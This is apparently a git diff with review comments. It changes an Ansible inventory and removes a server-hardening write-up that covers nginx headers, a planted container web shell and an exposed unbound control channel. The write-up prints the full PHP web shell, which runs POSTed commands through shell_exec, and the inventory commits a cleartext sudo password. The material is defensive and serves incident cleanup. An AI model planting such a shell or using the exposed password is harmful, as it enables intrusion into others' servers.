Compare commits


No commits in common. "0c57c12ac8ae59509a43fa53a14e4c553cdecc0e" and "512acb8db3ce6321eb797a7471b5fa9903b7b9de" have entirely different histories.

2 changed files with 4 additions and 108 deletions

View File

@ -5,6 +5,7 @@ all:
ansible_connection: ssh
ansible_become: yes
ansible_become_method: sudo
ansible_host: 64.227.120.192
ansible_ssh_user: root
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
ansible_host: ml-node
ansible_ssh_user: ml-node
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
ansible_become_pass: dobercaj420
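Review bot: `ansible_become_pass: dobercaj420` commits the sudo password for `ml-node` in cleartext, and since this is git it stays recoverable from history even after a later commit removes it, so it should be treated as exposed. Move it into an `ansible-vault`-encrypted vars file (or use `--ask-become-pass` at run time) and rotate the password on the host. Two smaller points in the same hunk: `ansible_ssh_user` is a deprecated alias for `ansible_user`, and because the rendering has dropped the `-`/`+` markers it is worth confirming that the old `ansible_host: 64.227.120.192` / `ansible_ssh_user: root` entry is actually removed rather than left as a duplicate key that silently overrides, or is overridden by, the `ml-node` one.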

View File

@ -274,90 +274,6 @@ server {
```
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
Lets enable xss protection in the nginx configuration.
```bash
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
```
And deny access to the all `.` files.
```bash
location ~ /\. {
deny all;
}
```
The process is run by the `conmon` process.
```bash
root@ls-2024-9:~# sudo lsof -i :8018
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
```
It is a podman container.
```bash
root@ls-2024-9:~# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
root@ls-2024-9:~#
```
When going into the container we can see the php reverse shell script.
```bash
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
root@4d05d4a1a404:/var/www/html# ls
app.js assets index.html manifest.json service-worker.js shell.php style.css
root@4d05d4a1a404:/var/www/html# cat shell.php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>CMD</title>
<style type="text/css">
body {
background: black;
font-family: courier,arial;
color: white;
}
</style>
</head>
<body>
<br/><br/><br/>
<center>
<form method="POST">
<input type="text" name="cmd" placeholder="cmd" size=100/>
<input type="submit" value="exec"/>
</form>
</center>
<br/><br/><br/>
<?php
if(isset($_POST['cmd'])){
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
}
?>
</body>
root@4d05d4a1a404:/var/www/html#
```
Lets remove the file now.
```bash
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
```
### Already f-up something
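Review bot: the `podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php` step only deletes the file from the running container's writable layer; if `shell.php` is baked into `docker.io/nejec/2048:latest` it returns on the next `podman run`, and pulling `:latest` by tag gives no guarantee which image that is. Check where it came from with `podman diff 4d05d4a1a404` (a file that is part of the image will not show up as an added change) and either rebuild and pin the image by digest or record the writable webroot as the real finding. On the nginx part of the hunk: `X-XSS-Protection` is a legacy header that Chromium-based browsers and Firefox no longer honour, so a `Content-Security-Policy` is the header that actually limits injected script; and `add_header` inside the `/2048/` location replaces any `add_header` lines inherited from the `server` block, so those have to be repeated in the location or it loses them. Finally, `podman ps` shows `0.0.0.0:8018->22/tcp`, i.e. host port 8018 is published to container port 22 rather than 80, which does not match "proxies requests to `/2048/` to `http://localhost:8018/`"; worth confirming the port mapping is what was intended.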
@ -462,24 +378,3 @@ Host ls2024_prep
### DNS
Problem here is that remote control is enabled and we can use it to get the root shell.
```txt
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
# default unbound control
remote-control:
control-enable: yes
control-interface: ::0
control-use-cert: no
```
Lets disable remote control completely. and restart the service.
```bash
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
```
This is all I found suspicious in the DNS configuration.
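Review bot: the hunk says remote control is disabled completely but then shows only `systemctl restart unbound`; the edit to `/etc/unbound/unbound.conf.d/remote-control.conf` is not in the diff, so as written the restart simply reloads the same `control-enable: yes` / `control-interface: ::0` / `control-use-cert: no` configuration, which exposes an unauthenticated control channel on every interface. Include the actual change (`control-enable: no`, or if control is needed, bind it to `127.0.0.1` and `::1` with `control-use-cert: yes`), run `unbound-checkconf` before the restart, and verify afterwards with `ss -lntp` that nothing is listening on the control port (8953 by default).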